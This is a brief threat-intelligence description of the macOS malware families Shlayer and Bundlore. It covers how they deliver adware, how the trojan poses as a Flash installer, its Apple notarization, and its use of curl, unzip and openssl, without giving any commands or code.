Shlayer and Bundlore are similar but have slightly different download, execution, and deobfuscation patterns that all involve curl, unzip, and openssl with certain command lines. Bundlore is frequently delivered as a second-stage payload, which often results in overlaps in public reporting in which certain TTPs are tracked under Bundlore by some teams and under Shlayer by others. Shlayer commonly delivers payloads such as AdLoad and Bundlore. In August 2020, Objective-See reported that Shlayer was the first malicious code to be notarized by Apple, granting it privileges to execute with default configurations of macOS Gatekeeper. The trojan masquerades as an installer for applications like Adobe Flash Player and executes numerous macOS commands to deobfuscate code and install adware with persistence mechanisms. Shlayer is a macOS malware family associated with ad fraud activity through the distribution of adware applications.
0 kommentar(er)
